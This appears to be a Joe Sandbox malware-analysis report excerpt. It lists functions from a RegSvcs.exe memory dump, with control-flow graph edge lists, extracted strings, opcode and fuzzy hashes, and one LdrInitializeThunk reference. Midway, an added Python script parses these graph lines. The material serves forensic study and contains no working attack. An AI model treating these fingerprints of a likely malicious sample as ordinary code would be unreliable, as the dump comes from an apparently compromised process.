                                                                                                                                                                                • String ID: 8bq$Haq$Haq$TJbq
                                                                                                                                                                                • API String ID: 0-1338622358
                                                                                                                                                                                • Opcode ID: 23e49c662d96f995de5670bbebee7090c4fc333e6d1094c9d9ceed8fed8bd668
                                                                                                                                                                                • Instruction ID: 0e8cc98a824d505dee307e645e5a7661e876d068db336ad74cf4d814ee20cac1
                                                                                                                                                                                • Opcode Fuzzy Hash: 23e49c662d96f995de5670bbebee7090c4fc333e6d1094c9d9ceed8fed8bd668
                                                                                                                                                                                • Instruction Fuzzy Hash: EC919F74B002048FDB09DBACC484AAEBBFAFF89320F544455E509EB7A5CA31DC46CB91

                                                                                                                                                                                 Control-flow Graph (graph rendering not reproduced; executed/not-executed basic-block edge list omitted)
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: $Haq$Haq$Haq
• API String ID: 0-432640594
• Opcode ID: 06b6e2f7a4cf35d5a205eade51c4106fe4a4e675d9a3176651886c5ed3393b39
• Instruction ID: 59ea722da4063554c637a628bc8c1ecb76e30b5a83b763ac5e8d8e8343fffd25
• Opcode Fuzzy Hash: 06b6e2f7a4cf35d5a205eade51c4106fe4a4e675d9a3176651886c5ed3393b39
• Instruction Fuzzy Hash: 8C9125307042549FDB069FB8885866E7FB6FFC6221B54456AE91ACB3D2CE34DC06CB91

Control-flow Graph

control_flow_graph 783 19acf30-19acf67 call 19ac7e0 789 19acf6d-19acf6f 783->789 790 19ad143-19ad14e 783->790 791 19ad155-19ad160 789->791 792 19acf75-19acf79 789->792 790->791 798 19ad167-19ad172 791->798 792->791 793 19acf7f-19acfb7 call 19aabd8 792->793 793->798 807 19acfbd-19acfc1 793->807 802 19ad179-19ad184 798->802 806 19ad18b-19ad1b7 802->806 842 19ad1be-19ad1ea 806->842 808 19acfcd-19acfd1 807->808 809 19acfc3-19acfc7 807->809 811 19acfdc-19acfe0 808->811 812 19acfd3-19acfda 808->812 809->802 809->808 813 19acff8-19acffc 811->813 814 19acfe2-19acfe6 811->814 812->813 817 19acffe-19ad000 813->817 818 19ad003-19ad00a 813->818 815 19acfe8-19acfef 814->815 816 19acff1 814->816 815->813 816->813 817->818 820 19ad00c 818->820 821 19ad013-19ad017 818->821 820->821 822 19ad0c8-19ad0cb 820->822 823 19ad131-19ad13c 820->823 824 19ad066-19ad069 820->824 825 19ad095-19ad098 820->825 826 19ad01d-19ad021 821->826 827 19ad0f6-19ad0f9 821->827 829 19ad0cd 822->829 830 19ad0d2-19ad0f1 822->830 823->790 831 19ad06b-19ad06e 824->831 832 19ad074-19ad093 824->832 836 19ad09a-19ad09d 825->836 837 19ad0a3-19ad0c6 825->837 826->823 833 19ad027-19ad02a 826->833 834 19ad0fb-19ad0fe 827->834 835 19ad109-19ad12c 827->835 829->830 857 19ad04f-19ad053 830->857 831->806 831->832 832->857 839 19ad02c 833->839 840 19ad031-19ad04d 833->840 834->835 841 19ad100-19ad103 834->841 835->857 836->837 836->842 837->857 839->840 840->857 841->835 846 19ad1f1-19ad24e 841->846 842->846 867 19ad24e 846->867 868 19ad255-19ad263 846->868 894 19ad056 call 19ad558 857->894 895 19ad056 call 19ad4b8 857->895 896 19ad056 call 19ad4a8 857->896 897 19ad056 call 19ad608 857->897 860 19ad05c-19ad063 867->868 869 19ad250-19ad254 867->869 871 19ad2c5-19ad329 868->871 872 19ad265-19ad268 868->872 869->868 889 19ad32b-19ad330 871->889 890 19ad332-19ad342 871->890 872->871 873 19ad26a-19ad279 872->873 877 19ad27b-19ad281 873->877 878 19ad291-19ad295 873->878 881 19ad283 877->881 882 19ad285-19ad287 877->882 879 19ad2bd-19ad2c4 878->879 880 19ad297-19ad2b7 878->880 880->879 881->878 882->878 891 19ad347-19ad348 889->891 890->891 894->860 895->860 896->860 897->860
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: $Haq$Haq$Haq
• API String ID: 0-432640594
• Opcode ID: 544981baa67eb6e01de025aa5014911eac9d1a197682a4ca458d3312eea5087f
• Instruction ID: 2df20b9cfbaf9242847532a13db87c4a25fa9304964bc25b2c1f8eaed4191b15
• Opcode Fuzzy Hash: 544981baa67eb6e01de025aa5014911eac9d1a197682a4ca458d3312eea5087f
• Instruction Fuzzy Hash: 588102307042049FDB165F78885866E7EA6BFC6361F948229E92ACB3D1CE359C06CB91
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: 42310754a9a76dcf066f84736083d8aabfbf7badc62d73c7b004000260481d44
• Instruction ID: d9235b8ed5d0e3d103b1cf0fa853d0edeba0c6a641c03d818070409a2c7eb102
• Opcode Fuzzy Hash: 42310754a9a76dcf066f84736083d8aabfbf7badc62d73c7b004000260481d44
• Instruction Fuzzy Hash: B3C1C5706006068FDB15DF6CC480ABABBFAFF84305F95896AD609CB252D735E949CBD0

Control-flow Graph

control_flow_graph 2749 19a5460-19a546d 2751 19a546f-19a5473 2749->2751 2752 19a5475-19a5477 2749->2752 2751->2752 2753 19a547c-19a5487 2751->2753 2754 19a5688-19a568f 2752->2754 2755 19a548d-19a5494 2753->2755 2756 19a5690 2753->2756 2757 19a549a-19a54a9 2755->2757 2758 19a5629-19a562f 2755->2758 2760 19a5695-19a56cd 2756->2760 2759 19a54af-19a54be 2757->2759 2757->2760 2761 19a5631-19a5633 2758->2761 2762 19a5635-19a5639 2758->2762 2768 19a54d3-19a54d6 2759->2768 2769 19a54c0-19a54c3 2759->2769 2780 19a56cf-19a56d4 2760->2780 2781 19a56d6-19a56da 2760->2781 2761->2754 2763 19a563b-19a5641 2762->2763 2764 19a5686 2762->2764 2763->2756 2766 19a5643-19a5646 2763->2766 2764->2754 2766->2756 2770 19a5648-19a565d 2766->2770 2771 19a54e2-19a54e8 2768->2771 2773 19a54d8-19a54db 2768->2773 2769->2771 2772 19a54c5-19a54c8 2769->2772 2789 19a565f-19a5665 2770->2789 2790 19a5681-19a5684 2770->2790 2782 19a54ea-19a54f0 2771->2782 2783 19a5500-19a551d 2771->2783 2775 19a55c9-19a55cf 2772->2775 2776 19a54ce 2772->2776 2777 19a552e-19a5534 2773->2777 2778 19a54dd 2773->2778 2784 19a55d1-19a55d7 2775->2784 2785 19a55e7-19a55f1 2775->2785 2786 19a55f4-19a5601 2776->2786 2787 19a554c-19a555e 2777->2787 2788 19a5536-19a553c 2777->2788 2778->2786 2791 19a56e0-19a56e2 2780->2791 2781->2791 2792 19a54f2 2782->2792 2793 19a54f4-19a54fe 2782->2793 2823 19a5526-19a5529 2783->2823 2796 19a55db-19a55e5 2784->2796 2797 19a55d9 2784->2797 2785->2786 2814 19a5603-19a5607 2786->2814 2815 19a5615-19a5617 2786->2815 2808 19a556e-19a5591 2787->2808 2809 19a5560-19a556c 2787->2809 2799 19a553e 2788->2799 2800 19a5540-19a554a 2788->2800 2801 19a5677-19a567a 2789->2801 2802 19a5667-19a5675 2789->2802 2790->2754 2794 19a56f7-19a56fe 2791->2794 2795 19a56e4-19a56f6 2791->2795 2792->2783 2793->2783 2796->2785 2797->2785 2799->2787 2800->2787 2801->2756 2804 19a567c-19a567f 2801->2804 2802->2756 2802->2801 2804->2789 2804->2790 2808->2756 2827 19a5597-19a559a 2808->2827 2824 19a55b9-19a55c7 2809->2824 2814->2815 2817 19a5609-19a560d 2814->2817 2818 19a561b-19a561e 2815->2818 2817->2756 2819 19a5613 2817->2819 2818->2756 2820 19a5620-19a5623 2818->2820 2819->2818 2820->2757 2820->2758 2823->2786 2824->2786 2827->2756 2828 19a55a0-19a55b2 2827->2828 2828->2824
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: ,aq$,aq
• API String ID: 0-2990736959
• Opcode ID: 4cb232fde9deb606441b88045334ff294ae51e804c9b7a87b93f90bd9e7dcd9a
• Instruction ID: 7480ed63bb28cd424b99aeddb094cfec5a1365f6ae091e83f0d98a596c7d7d62
• Opcode Fuzzy Hash: 4cb232fde9deb606441b88045334ff294ae51e804c9b7a87b93f90bd9e7dcd9a
• Instruction Fuzzy Hash: C1819E30B00505CFEB14CF6DD484AAABBBAFF88215B968469D509DB365DB31EC45CB90

Control-flow Graph

control_flow_graph 2889 19a4ef0-19a4f22 2890 19a4f38-19a4f43 2889->2890 2891 19a4f24-19a4f28 2889->2891 2894 19a4feb-19a5017 2890->2894 2895 19a4f49-19a4f4b 2890->2895 2892 19a4f2a-19a4f36 2891->2892 2893 19a4f50-19a4f57 2891->2893 2892->2890 2892->2893 2896 19a4f59-19a4f60 2893->2896 2897 19a4f77-19a4f80 2893->2897 2901 19a501e-19a505a 2894->2901 2898 19a4fe3-19a4fe8 2895->2898 2896->2897 2899 19a4f62-19a4f6d 2896->2899 3003 19a4f82 call 19a5068 2897->3003 3004 19a4f82 call 19a4ef0 2897->3004 2899->2901 2902 19a4f73-19a4f75 2899->2902 2921 19a505c-19a5060 2901->2921 2922 19a5061-19a5062 2901->2922 2902->2898 2903 19a4f88-19a4f8a 2904 19a4f8c-19a4f90 2903->2904 2905 19a4f92-19a4f9a 2903->2905 2904->2905 2907 19a4fad-19a4fbe 2904->2907 2908 19a4fa9-19a4fab 2905->2908 2909 19a4f9c-19a4fa1 2905->2909 3005 19a4fc1 call 19a5978 2907->3005 3006 19a4fc1 call 19a5968 2907->3006 2908->2898 2909->2908 2913 19a4fc7-19a4fcc 2915 19a4fce-19a4fd7 2913->2915 2916 19a4fe1 2913->2916 2998 19a4fd9 call 19a9f6d 2915->2998 2999 19a4fd9 call 19a9eb0 2915->2999 3000 19a4fd9 call 19a9ec0 2915->3000 2916->2898 2918 19a4fdf 2918->2898 2921->2922 2923 19a5069-19a5076 2922->2923 2924 19a5064 2922->2924 2925 19a5078-19a507e 2923->2925 2926 19a5085-19a5097 2923->2926 2924->2923 2925->2926 2928 19a512b-19a512d 2926->2928 2929 19a509d-19a50a1 2926->2929 3001 19a512f call 19a52bb 2928->3001 3002 19a512f call 19a52c8 2928->3002 2930 19a50a3-19a50af 2929->2930 2931 19a50b1-19a50be 2929->2931 2939 19a50c0-19a50ca 2930->2939 2931->2939 2932 19a5135-19a513b 2933 19a513d-19a5143 2932->2933 2934 19a5147-19a514e 2932->2934 2937 19a51a9-19a5208 2933->2937 2938 19a5145 2933->2938 2953 19a520f-19a521a 2937->2953 2938->2934 2942 19a50cc-19a50db 2939->2942 2943 19a50f7-19a50fb 2939->2943 2951 19a50eb-19a50f5 2942->2951 2952 19a50dd-19a50e4 2942->2952 2944 19a50fd-19a5103 2943->2944 2945 19a5107-19a510b 2943->2945 2948 19a5151-19a51a2 2944->2948 2949 19a5105 2944->2949 2945->2934 2950 19a510d-19a5111 2945->2950 2948->2937 2949->2934 2950->2953 2954 19a5117-19a5129 2950->2954 2951->2943 2952->2951 2962 19a521c-19a5220 2953->2962 2963 19a5221-19a5222 2953->2963 2954->2934 2962->2963 2966 19a5229-19a5233 2963->2966 2967 19a5224 2963->2967 2968 19a5239-19a523b 2966->2968 2969 19a5235-19a5237 2966->2969 2967->2966 2972 19a524c-19a524e 2968->2972 2973 19a523d-19a5241 2968->2973 2971 19a52b1-19a52b4 2969->2971 2978 19a5250-19a5254 2972->2978 2979 19a5261-19a5267 2972->2979 2976 19a5243-19a5245 2973->2976 2977 19a5247-19a524a 2973->2977 2976->2971 2977->2971 2981 19a525a-19a525f 2978->2981 2982 19a5256-19a5258 2978->2982 2983 19a5269-19a5290 2979->2983 2984 19a5292-19a5294 2979->2984 2981->2971 2982->2971 2986 19a529b-19a529d 2983->2986 2984->2986 2990 19a529f-19a52a1 2986->2990 2991 19a52a3-19a52a5 2986->2991 2990->2971 2992 19a52ae 2991->2992 2993 19a52a7-19a52ac 2991->2993 2992->2971 2993->2971 2998->2918 2999->2918 3000->2918 3001->2932 3002->2932 3003->2903 3004->2903 3005->2913 3006->2913
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: Haq$Haq
• API String ID: 0-4016896955
• Opcode ID: 70142d9260d0484acdce2cac3735d985f4b5bd246e16f58e00c21af8c2f2dafe
• Instruction ID: 13819ba3768c2dfbc29ce4db00ffa28f7c1016b0d7ea1ede30e709818c477226
• Opcode Fuzzy Hash: 70142d9260d0484acdce2cac3735d985f4b5bd246e16f58e00c21af8c2f2dafe
• Instruction Fuzzy Hash: 3361D2317042518FEB168F28C848BAA7FFAFF88305F498469E809CB291CB75C805DBD1

Control-flow Graph

control_flow_graph 3047 19a8bf0-19a8c11 3090 19a8c13 call 19a89d0 3047->3090 3091 19a8c13 call 19a8bf0 3047->3091 3049 19a8c19-19a8c20 3050 19a8c2c-19a8c4c 3049->3050 3051 19a8c22-19a8c27 3049->3051 3054 19a8c4e-19a8c50 3050->3054 3055 19a8c87-19a8c89 3050->3055 3052 19a8cf5-19a8cfc 3051->3052 3056 19a8c5f-19a8c66 3054->3056 3057 19a8c52-19a8c57 3054->3057 3058 19a8c8b-19a8c91 3055->3058 3059 19a8cf0 3055->3059 3060 19a8cff-19a8d0a 3056->3060 3061 19a8c6c-19a8c85 3056->3061 3057->3056 3058->3059 3062 19a8c93-19a8cae 3058->3062 3059->3052 3068 19a8d0c-19a8d10 3060->3068 3069 19a8d11-19a8d12 3060->3069 3061->3052 3066 19a8cb0-19a8cb2 3062->3066 3067 19a8ce5-19a8ce7 3062->3067 3072 19a8cc1-19a8cc8 3066->3072 3073 19a8cb4-19a8cb9 3066->3073 3067->3059 3074 19a8ce9-19a8cee 3067->3074 3068->3069 3070 19a8d19-19a8d2b call 19a85e8 3069->3070 3071 19a8d14 3069->3071 3078 19a8d39-19a8d42 call 19a85e8 3070->3078 3079 19a8d2d-19a8d37 3070->3079 3071->3070 3072->3060 3076 19a8cca-19a8ce3 3072->3076 3073->3072 3074->3052 3076->3052 3084 19a8d50-19a8d5e call 19a8d90 3078->3084 3085 19a8d44-19a8d4e 3078->3085 3079->3078 3086 19a8d64-19a8d8d 3084->3086 3085->3084 3090->3049 3091->3049
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: ec9adb06fbb986a8dda147814156993841b6a892b3050df6199398004ba50cab
• Instruction ID: 4a0f09c1a24df87834fd828e96706a65bfe97a82b8775ff15c490e9ea9ebccfb
• Opcode Fuzzy Hash: ec9adb06fbb986a8dda147814156993841b6a892b3050df6199398004ba50cab
• Instruction Fuzzy Hash: 2951A030B012459FEB05DF6DC844B6A7BEAEF88316F54C466E909CB256DB71CC058BE1
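The `control_flow_graph` lines in this section are the text form of the graphs the report draws: a basic block is written as `<node> <start>-<end>` (a single address for a one-instruction block), optionally followed by `call <target>`, and an edge as `<src>-><dst>`. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin; the grammar it parses is inferred from these lines and is an assumption. It reads the report's own line for the function at 19a8bf0 and reports the entry and exit blocks, blocks unreachable from the entry, the distinct call targets, call sites whose target is the function's own entry (19a8bf0 here), and call-site addresses listed with more than one target (19a8c13 here, listed with both 19a89d0 and 19a8bf0). The other `control_flow_graph` lines in this section follow the same grammar.

```python
"""Parse one Joe Sandbox 'control_flow_graph' line and summarise the function.
Added example, not code from the Joe Sandbox report or its IDA plugin. The token
grammar below is inferred from the report's own lines (an assumption):
    <node> <start>[-<end>] [call <target>]   a basic block;   <src>-><dst>   an edge
"""
from collections import deque
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Sample input: the report's line for the function at 19a8bf0 (RegSvcs.exe dump
# at 019A0000), copied verbatim and split across string literals for readability.
SAMPLE = (
    "control_flow_graph 3047 19a8bf0-19a8c11 3090 19a8c13 call 19a89d0 3047->3090 3091 19a8c13 "
    "call 19a8bf0 3047->3091 3049 19a8c19-19a8c20 3050 19a8c2c-19a8c4c 3049->3050 3051 19a8c22-19a8c27 "
    "3049->3051 3054 19a8c4e-19a8c50 3050->3054 3055 19a8c87-19a8c89 3050->3055 3052 19a8cf5-19a8cfc "
    "3051->3052 3056 19a8c5f-19a8c66 3054->3056 3057 19a8c52-19a8c57 3054->3057 3058 19a8c8b-19a8c91 "
    "3055->3058 3059 19a8cf0 3055->3059 3060 19a8cff-19a8d0a 3056->3060 3061 19a8c6c-19a8c85 3056->3061 "
    "3057->3056 3058->3059 3062 19a8c93-19a8cae 3058->3062 3059->3052 3068 19a8d0c-19a8d10 3060->3068 "
    "3069 19a8d11-19a8d12 3060->3069 3061->3052 3066 19a8cb0-19a8cb2 3062->3066 3067 19a8ce5-19a8ce7 "
    "3062->3067 3072 19a8cc1-19a8cc8 3066->3072 3073 19a8cb4-19a8cb9 3066->3073 3067->3059 "
    "3074 19a8ce9-19a8cee 3067->3074 3068->3069 3070 19a8d19-19a8d2b call 19a85e8 3069->3070 3071 19a8d14 "
    "3069->3071 3078 19a8d39-19a8d42 call 19a85e8 3070->3078 3079 19a8d2d-19a8d37 3070->3079 3071->3070 "
    "3072->3060 3076 19a8cca-19a8ce3 3072->3076 3073->3072 3074->3052 3076->3052 3084 19a8d50-19a8d5e "
    "call 19a8d90 3078->3084 3085 19a8d44-19a8d4e 3078->3085 3079->3078 3086 19a8d64-19a8d8d 3084->3086 "
    "3085->3084 3090->3049 3091->3049"
)


@dataclass
class Block:
    node: int                   # node id as printed by the plugin (decimal)
    start: int                  # first instruction address of the block
    end: int                    # last instruction address (== start for 1-insn blocks)
    call: Optional[int] = None  # call target attached to the block, if any


def parse_cfg(line: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    """Tokenise one control_flow_graph line into blocks (insertion-ordered) and edges."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # "3047->3090": an edge
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                  # "call 19a89d0": target of the last block
            if current is None:
                raise ValueError("'call' before any block definition")
            current.call = int(tokens[i + 1], 16)
            i += 2
        else:                                # "3047 19a8bf0-19a8c11": a block
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)
            current = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[current.node] = current
            i += 2
    return blocks, edges


def summarize(blocks: Dict[int, Block], edges: List[Tuple[int, int]]) -> dict:
    """Entry/exit blocks, reachability from the entry, and call-site facts."""
    succ: Dict[int, List[int]] = {n: [] for n in blocks}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    entry = next(iter(blocks))               # the plugin lists the entry block first
    seen, queue = {entry}, deque([entry])
    while queue:                             # BFS over successor edges
        for nxt in succ.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    calls = {n: b.call for n, b in blocks.items() if b.call is not None}
    # A call-site address listed with several targets is flagged for manual review.
    by_site: Dict[int, set] = {}
    for n, target in calls.items():
        by_site.setdefault(blocks[n].start, set()).add(target)
    return {
        "entry": entry,
        "exits": sorted(n for n in blocks if not succ[n]),
        "unreachable": sorted(n for n in blocks if n not in seen),
        "call_targets": sorted(set(calls.values())),
        "self_calls": sorted(n for n, t in calls.items() if t == blocks[entry].start),
        "ambiguous_sites": {hex(a): sorted(t) for a, t in by_site.items() if len(t) > 1},
        "span": (min(b.start for b in blocks.values()), max(b.end for b in blocks.values())),
    }


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE)
    print(f"{len(blocks)} blocks, {len(edges)} edges")
    for key, value in summarize(blocks, edges).items():
        print(f"{key}: {value}")
```

For the 19a8bf0 line this yields 31 blocks and 44 edges, exit blocks 3052 and 3086, no unreachable block, and call targets 19a85e8, 19a89d0, 19a8bf0 and 19a8d90; the `call_targets` are the addresses of the functions this one calls, which is where to pivot next in the dump.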

Control-flow Graph

control_flow_graph 3093 19a2c88-19a2ca1 3096 19a2cb2-19a2cba 3093->3096 3097 19a2ca3-19a2ca5 3093->3097 3100 19a2cbc-19a2cca 3096->3100 3098 19a2cab-19a2cb0 3097->3098 3099 19a2ca7-19a2ca9 3097->3099 3098->3100 3099->3100 3103 19a2ccc-19a2cce 3100->3103 3104 19a2ce0-19a2ce8 3100->3104 3105 19a2cd0-19a2cd5 3103->3105 3106 19a2cd7-19a2cde 3103->3106 3107 19a2ceb-19a2cee 3104->3107 3105->3107 3106->3107 3109 19a2cf0-19a2cfe 3107->3109 3110 19a2d05-19a2d09 3107->3110 3109->3110 3116 19a2d00 3109->3116 3111 19a2d0b-19a2d19 3110->3111 3112 19a2d22-19a2d25 3110->3112 3111->3112 3122 19a2d1b 3111->3122 3114 19a2d2d-19a2d62 3112->3114 3115 19a2d27-19a2d2b 3112->3115 3123 19a2dc4-19a2dc9 3114->3123 3115->3114 3118 19a2d64-19a2d7b 3115->3118 3116->3110 3120 19a2d7d-19a2d7f 3118->3120 3121 19a2d81-19a2d8d 3118->3121 3120->3123 3124 19a2d8f-19a2d95 3121->3124 3125 19a2d97-19a2da1 3121->3125 3122->3112 3127 19a2da9 3124->3127 3125->3127 3128 19a2da3 3125->3128 3129 19a2db1-19a2dbd 3127->3129 3128->3127 3129->3123
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: Xaq$Xaq
• API String ID: 0-1488805882
• Opcode ID: a6adf740d16db8ac1dad8bae02ce243d801a1064294836a5d269ee3f25779027
• Instruction ID: 89ea7f236684ab5c3f1a8e3c31c2158c764e8ee275cc9de32ea09b190aab1fcb
• Opcode Fuzzy Hash: a6adf740d16db8ac1dad8bae02ce243d801a1064294836a5d269ee3f25779027
• Instruction Fuzzy Hash: 7731C631B002158BEB2D4BAD999867EAAEEBFC4201F544439E91BC7386DF74CC4D86D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: ee81ded530f03f70b8f8da83bda68ad24f0bc819a2b12a8252a2ec0c9994c865
                                                                                                                                                                                • Instruction ID: b63078fcd1a1fa69ec8e552c641b8e2ae77ad349d0b9991fd3f85555c43cd6bf
                                                                                                                                                                                • Opcode Fuzzy Hash: ee81ded530f03f70b8f8da83bda68ad24f0bc819a2b12a8252a2ec0c9994c865
                                                                                                                                                                                • Instruction Fuzzy Hash: B931D4313041418FDB2E8BBC8C96A3D7F6DEF84701B654896E12ACB356DA26DD44C7E1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                                                                • Opcode ID: a7547e71e21e8b0d3141e0f9184ec0c4ed4284072dd6df34a39e6b190a22f170
                                                                                                                                                                                • Instruction ID: f5e97818349af059cf3283037d3c19d773d7d1f0489f26fa4188cb8a5774e99e
                                                                                                                                                                                • Opcode Fuzzy Hash: a7547e71e21e8b0d3141e0f9184ec0c4ed4284072dd6df34a39e6b190a22f170
                                                                                                                                                                                • Instruction Fuzzy Hash: C6311535B401098FCB45DFA8C584E9EBBF6FF88320F595454E509AB365CA30ED89CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                                                                • Opcode ID: 6f2f97bb23af707f8b43a641785867dff6dd631ce8faf990283ec66d6be73868
                                                                                                                                                                                • Instruction ID: f204d39c9e4aaf792d72d9d563ab574e4e0758d0a06639d3393faf0c5a1eea8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2f97bb23af707f8b43a641785867dff6dd631ce8faf990283ec66d6be73868
                                                                                                                                                                                • Instruction Fuzzy Hash: EF313434B401098FCB45DFA8C580E9EBBB6FF88320F595454E509AB375CA70EC89CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 068E4A86
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9b753e74402e6768e40cef12dae3b4a6ceb8ef28d6491ccb2fbbd344ccb71f91
                                                                                                                                                                                • Instruction ID: 9f7f64de8a3da03c34686c7dd07ea641ce6f6d095299e2461336abdc812c5ccc
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b753e74402e6768e40cef12dae3b4a6ceb8ef28d6491ccb2fbbd344ccb71f91
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A1156B4E011098FDB44CBA8D884AEDBBF5EB89324F50C165E818E7242DB30E941CBA4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: fe0c2e501f190b0d0029458efcf1878ed3cff2138470e3b5ab13b2207eff4f13
                                                                                                                                                                                • Instruction ID: 4c4ba3a261398aee16e04bea16ab5f26ed00133b175e6bb1e8f935dd6fcd3c20
                                                                                                                                                                                • Opcode Fuzzy Hash: fe0c2e501f190b0d0029458efcf1878ed3cff2138470e3b5ab13b2207eff4f13
                                                                                                                                                                                • Instruction Fuzzy Hash: 4FA10D74A0020ACFCF14DFA8EA859AEBBB9FF48304F105569E505A7365DB39AD05CF81
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 2d998a14a91cd49d6309461ef98130ab6503449925f1fe2aa816afde1e61efe1
                                                                                                                                                                                • Instruction ID: cd78c17e6824194be121c08b1a635c862687217b79234b03726ceb2ec10f2616
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d998a14a91cd49d6309461ef98130ab6503449925f1fe2aa816afde1e61efe1
                                                                                                                                                                                • Instruction Fuzzy Hash: 63A10D74A0020ACFCF14DFA8EA859AEBBB9FF48300F105569E515A7364DB39AD05CF81
